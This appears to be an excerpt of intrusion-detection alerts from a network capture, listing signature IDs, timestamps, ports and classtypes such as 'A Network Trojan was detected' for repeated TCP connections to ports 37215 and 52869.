                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2027339
                      Source Port:39920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:48476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2831300
                      Source Port:45566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2835222
                      Source Port:59668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.981370
                      SID:2027339
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:33080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:54948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2829579
                      Source Port:42654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.208471
                      SID:2025132
                      Source Port:59396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2025132
                      Source Port:41788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:36262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.055828
                      SID:2027339
                      Source Port:60794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2829579
                      Source Port:51892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.159645
                      SID:2027339
                      Source Port:33802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:53.423905
                      SID:2027339
                      Source Port:38156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.640698
                      SID:2831300
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2025132
                      Source Port:58900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2829579
                      Source Port:54376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.565663
                      SID:2027339
                      Source Port:60278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:39486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.592911
                      SID:2025132
                      Source Port:52384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.839000
                      SID:2027339
                      Source Port:38646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.576576
                      SID:2025132
                      Source Port:56204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.588323
                      SID:2831300
                      Source Port:55340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.447609
                      SID:2027339
                      Source Port:53972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:47084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.315621
                      SID:2831300
                      Source Port:54682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.258778
                      SID:2027339
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.041924
                      SID:2831300
                      Source Port:60066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.449873
                      SID:2025132
                      Source Port:48264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.532287
                      SID:2831300
                      Source Port:60684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.758558
                      SID:2027339
                      Source Port:58220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.127325
                      SID:2829579
                      Source Port:48800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:48094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2835222
                      Source Port:57274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.582882
                      SID:2025132
                      Source Port:47092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:60164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2831300
                      Source Port:57524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.540433
                      SID:2831300
                      Source Port:57800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2831300
                      Source Port:43606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.037561
                      SID:2025132
                      Source Port:53274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:56286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.500342
                      SID:2831300
                      Source Port:43528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.186768
                      SID:2027339
                      Source Port:50582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2831300
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.685688
                      SID:2027339
                      Source Port:33874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2835222
                      Source Port:34058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:33694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2831300
                      Source Port:46348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.919214
                      SID:2027339
                      Source Port:33030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.136885
                      SID:2831300
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.535864
                      SID:2027339
                      Source Port:51832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.826739
                      SID:2027339
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.269587
                      SID:2027339
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.515260
                      SID:2025132
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.994605
                      SID:2027339
                      Source Port:34114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:41910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2829579
                      Source Port:60090
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2025132
                      Source Port:50146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:42822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2831300
                      Source Port:37524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.314338
                      SID:2027339
                      Source Port:37080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.010711
                      SID:2027339
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:34622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:35846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.094611
                      SID:2025132
                      Source Port:40510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.822070
                      SID:2831300
                      Source Port:41324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2831300
                      Source Port:38318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2027339
                      Source Port:40988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2027339
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.463480
                      SID:2025132
                      Source Port:58736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2831300
                      Source Port:36584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2027339
                      Source Port:59496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.719355
                      SID:2835222
                      Source Port:42064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.676725
                      SID:2027339
                      Source Port:37242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2027339
                      Source Port:46824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.250288
                      SID:2025132
                      Source Port:33082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:54502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2027339
                      Source Port:44552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2835222
                      Source Port:32814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2027339
                      Source Port:50736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625646
                      SID:2829579
                      Source Port:51272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2027339
                      Source Port:39820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.692046
                      SID:2027339
                      Source Port:53780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2831300
                      Source Port:54474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:55500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.381718
                      SID:2025132
                      Source Port:45780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:49262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.787409
                      SID:2025132
                      Source Port:59748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:59818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.925983
                      SID:2025132
                      Source Port:36106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2027339
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176056
                      SID:2027339
                      Source Port:39862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:53584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2027339
                      Source Port:52162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.692606
                      SID:2027339
                      Source Port:56016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.363153
                      SID:2027339
                      Source Port:34748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2831300
                      Source Port:57206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:33.760297
                      SID:2025132
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2831300
                      Source Port:58758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.776696
                      SID:2027339
                      Source Port:47418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2835222
                      Source Port:59544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176373
                      SID:2831300
                      Source Port:54530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:45960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2027339
                      Source Port:39486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.427852
                      SID:2027339
                      Source Port:40526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:58842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2027339
                      Source Port:40242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2027339
                      Source Port:55376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2831300
                      Source Port:39660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2835222
                      Source Port:38900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.158428
                      SID:2030490
                      Source Port:43130
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2025132
                      Source Port:55024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2831300
                      Source Port:40914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.472705
                      SID:2831300
                      Source Port:38590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.008589
                      SID:2027339
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.081693
                      SID:2831300
                      Source Port:46610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.800662
                      SID:2027339
                      Source Port:41474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470290
                      SID:2027339
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.812176
                      SID:2027339
                      Source Port:47360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2025132
                      Source Port:43258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.815872
                      SID:2025132
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.161234
                      SID:2027339
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2829579
                      Source Port:43250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2831300
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.884914
                      SID:2027339
                      Source Port:34726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.171917
                      SID:2027339
                      Source Port:36752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2835222
                      Source Port:40354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2027339
                      Source Port:53362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.602644
                      SID:2025132
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:52988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:60992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.653067
                      SID:2027339
                      Source Port:52802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.787869
                      SID:2027339
                      Source Port:47004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.338625
                      SID:2025132
                      Source Port:39432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2027339
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.900733
                      SID:2025132
                      Source Port:36170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.619289
                      SID:2829579
                      Source Port:54762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2025132
                      Source Port:52916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2025132
                      Source Port:51554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2027339
                      Source Port:39724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.736310
                      SID:2831300
                      Source Port:45114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2829579
                      Source Port:48016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:34320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2831300
                      Source Port:42938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:39.662031
                      SID:2831300
                      Source Port:52444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2027339
                      Source Port:47970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.880010
                      SID:2027339
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.209420
                      SID:2025132
                      Source Port:45560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:43866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.204945
                      SID:2027339
                      Source Port:52742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:42024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2027339
                      Source Port:49268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2025132
                      Source Port:35158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.413340
                      SID:2027339
                      Source Port:35932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.322039
                      SID:2831300
                      Source Port:45658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:49870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.097390
                      SID:2025132
                      Source Port:41728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.098635
                      SID:2027339
                      Source Port:49582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164212
                      SID:2027339
                      Source Port:40334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2829579
                      Source Port:60136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2027339
                      Source Port:45980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:60958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.743174
                      SID:2027339
                      Source Port:34904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.395498
                      SID:2027339
                      Source Port:37946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.982145
                      SID:2027339
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:38450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2027339
                      Source Port:43338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.949715
                      SID:2027339
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.586481
                      SID:2025132
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.439868
                      SID:2025132
                      Source Port:57118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:08.060226
                      SID:2027339
                      Source Port:60970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2831300
                      Source Port:33356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.488760
                      SID:2831300
                      Source Port:46054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2025132
                      Source Port:43772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.078168
                      SID:2025132
                      Source Port:42272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.813487
                      SID:2831300
                      Source Port:39692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2027339
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2025132
                      Source Port:44770
                      Destination Port:52869
                      Protocol:TCP
